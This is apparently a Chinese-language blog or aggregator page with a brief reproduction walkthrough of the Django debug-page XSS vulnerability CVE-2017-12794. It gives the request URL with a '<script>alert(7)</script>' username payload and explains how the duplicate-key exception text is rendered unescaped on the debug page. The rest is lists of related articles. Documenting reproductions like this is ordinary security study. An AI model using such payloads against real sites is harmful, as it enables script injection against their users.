Django debug page XSS漏洞(CVE-2017-12794)
1.建立個用戶:ip:8000/create_user/?username=<script>alert(7)</script>xss
顯示用戶已建立。
2.觸發漏洞,再次訪問ip:8000/create_user/?username=<script>alert(7)</script>ide
3.觸發異常:code
duplicate key value violates unique constraint "xss_user_username_key" DETAIL: Key (username)=(<script>alert(7)</script>) already exists.
4.這個異常被拼接進The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最後觸發XSS。圖片
相關文章
- 1. Django debug page XSS漏洞(CVE-2017-12794)
- 2. XSS漏洞《轉》
- 3. XSS - 漏洞
- 4. XSS漏洞
- 5. xss漏洞
- 6. 9、XSS漏洞
- 7. xss漏洞之——初識xss
- 8. CTF之XSS漏洞
- 9. XSS漏洞概述
- 10. XSS漏洞分析
- 更多相關文章...
- • Lua 調試(Debug) - Lua 教程
- • Eclipse Debug 配置 - Eclipse 教程
- • JDK13 GA發佈:5大特性解讀
- • 三篇文章瞭解 TiDB 技術內幕——說存儲
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. Django debug page XSS漏洞(CVE-2017-12794)
- 2. XSS漏洞《轉》
- 3. XSS - 漏洞
- 4. XSS漏洞
- 5. xss漏洞
- 6. 9、XSS漏洞
- 7. xss漏洞之——初識xss
- 8. CTF之XSS漏洞
- 9. XSS漏洞概述
- 10. XSS漏洞分析